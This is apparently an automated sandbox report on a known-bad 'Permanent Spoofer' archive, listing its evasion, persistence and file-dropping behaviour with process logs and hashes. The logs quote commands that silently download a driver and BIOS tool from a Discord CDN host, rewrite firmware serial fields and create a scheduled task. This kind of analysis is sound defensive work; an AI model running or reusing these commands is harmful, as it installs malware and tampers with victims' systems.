Analysis Overview
SHA256
18787f859db9b4df0cf089d0a8d3229847300b22ee1e5c6f2c1f34d2013b6cc6
Threat Level: Known bad
The file oh no.zip was found to be: Known bad.
Malicious Activity Summary
Modifies visibility of hidden/system files in Explorer
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Obfuscated with Agile.Net obfuscator
Executes dropped EXE
Loads dropped DLL
Themida packer
Checks BIOS information in registry
Adds Run key to start application
Checks whether UAC is enabled
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Windows directory
Unsigned PE
Detects Pyinstaller
System Location Discovery: System Language Discovery
Modifies registry class
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Scheduled Task/Job: Scheduled Task
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-09-27 20:13
Signatures
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral4
Detonation Overview
Submitted
2024-09-27 20:10
Reported
2024-09-27 20:19
Platform
win10v2004-20240802-en
Max time kernel
127s
Max time network
148s
Command Line
Signatures
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\amifldrv64.sys | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\AMIDEWINx64.EXE | C:\Windows\system32\curl.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\discord-1086389167996547133\ = "URL:Run game 1086389167996547133 protocol" | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\discord-1086389167996547133\URL Protocol | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\discord-1086389167996547133\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\oh no\\Permanent Spoofer\\spoofer.exe" | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\discord-1086389167996547133\shell\open\command | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\discord-1086389167996547133\shell\open | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\discord-1086389167996547133 | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\discord-1086389167996547133\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\discord-1086389167996547133\shell | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\discord-1086389167996547133\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\oh no\\Permanent Spoofer\\spoofer.exe" | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe
"C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c color 1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1154954276758634506/1155262042295513219/amifldrv64.sys -o C:\Windows\amifldrv64.sys --silent
C:\Windows\system32\curl.exe
curl https://cdn.discordapp.com/attachments/1154954276758634506/1155262042295513219/amifldrv64.sys -o C:\Windows\amifldrv64.sys --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1154954276758634506/1155262042731716658/AMIDEWINx64.EXE -o C:\Windows\AMIDEWINx64.EXE --silent
C:\Windows\system32\curl.exe
curl https://cdn.discordapp.com/attachments/1154954276758634506/1155262042731716658/AMIDEWINx64.EXE -o C:\Windows\AMIDEWINx64.EXE --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /IVN DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /IV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /IV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SM DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SP DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SS DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SU AUTO >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SK DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SF DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BM DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BP DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BS DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BT DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BLC DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CM DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CS DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CA DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CSK DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /PSN DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /PAT DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /PPN DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 1 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 2 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 3 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 4 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 5 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 6 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 7 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 8 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 9 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 10 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 11 DHQX992121213-%RANDOM% >nul
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 233.133.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.210.23.2.in-addr.arpa | udp |
Files
C:\Windows\AMIDEWINx64.EXE
| MD5 | a1ca4bebcd03fafbe2b06a46a694e29a |
| SHA1 | ffc88125007c23ff6711147a12f9bba9c3d197ed |
| SHA256 | c3fa59901d56ce8a95a303b22fd119cb94abf4f43c4f6d60a81fd78b7d00fa65 |
| SHA512 | 6fe1730bf2a6bba058c5e1ef309a69079a6acca45c0dbca4e7d79c877257ac08e460af741459d1e335197cf4de209f2a2997816f2a2a3868b2c8d086ef789b0e |
Analysis: behavioral1
Detonation Overview
Submitted
2024-09-27 20:10
Reported
2024-09-27 20:19
Platform
win7-20240903-en
Max time kernel
151s
Max time network
142s
Command Line
Signatures
Modifies visibility of hidden/system files in Explorer
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | \??\c:\windows\resources\svchost.exe | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | \??\c:\windows\resources\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | \??\c:\windows\resources\spoolsv.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | \??\c:\windows\resources\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | \??\c:\windows\resources\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | \??\c:\windows\resources\themes\explorer.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| N/A | N/A | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\themes\explorer.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\themes\explorer.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\svchost.exe | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" | \??\c:\windows\resources\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" | \??\c:\windows\resources\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" | \??\c:\windows\resources\themes\explorer.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | \??\c:\windows\resources\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | \??\c:\windows\resources\spoolsv.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\explorer.exe | \??\c:\windows\resources\themes\explorer.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\explorer.exe | \??\c:\windows\resources\svchost.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| N/A | N/A | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\themes\explorer.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Resources\Themes\icsys.icn.exe | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| File opened for modification | \??\c:\windows\resources\themes\explorer.exe | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| File opened for modification | \??\c:\windows\resources\spoolsv.exe | \??\c:\windows\resources\themes\explorer.exe | N/A |
| File opened for modification | \??\c:\windows\resources\svchost.exe | \??\c:\windows\resources\spoolsv.exe | N/A |
| File opened for modification | C:\Windows\Resources\tjud.exe | \??\c:\windows\resources\themes\explorer.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\resources\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\resources\spoolsv.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\discord-1086389167996547133\shell\open\command | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\discord-1086389167996547133\shell\open | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\discord-1086389167996547133\ = "URL:Run game 1086389167996547133 protocol" | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\discord-1086389167996547133\URL Protocol | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\discord-1086389167996547133\DefaultIcon | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\discord-1086389167996547133\DefaultIcon\ = "c:\\users\\admin\\appdata\\local\\temp\\oh no\\permanent spoofer\\spoofer.exe\u00a0" | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\discord-1086389167996547133\shell | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\discord-1086389167996547133\shell\open\command\ = "c:\\users\\admin\\appdata\\local\\temp\\oh no\\permanent spoofer\\spoofer.exe\u00a0" | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\discord-1086389167996547133 | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\windows\resources\themes\explorer.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\svchost.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| N/A | N/A | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| N/A | N/A | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\themes\explorer.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\themes\explorer.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe
"C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe"
\??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe 
"c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe "
C:\Windows\Resources\Themes\icsys.icn.exe
C:\Windows\Resources\Themes\icsys.icn.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c color 1
\??\c:\windows\resources\themes\explorer.exe
c:\windows\resources\themes\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1154954276758634506/1155262042295513219/amifldrv64.sys -o C:\Windows\amifldrv64.sys --silent
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe SE
\??\c:\windows\resources\svchost.exe
c:\windows\resources\svchost.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1154954276758634506/1155262042731716658/AMIDEWINx64.EXE -o C:\Windows\AMIDEWINx64.EXE --silent
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe PR
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /IVN DHQX992121213-%RANDOM% >nul
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 20:18 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /IV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /IV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SM DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SP DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SS DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SU AUTO >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SK DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SF DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BM DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BP DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BS DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BT DHQX992121213-%RANDOM% >nul
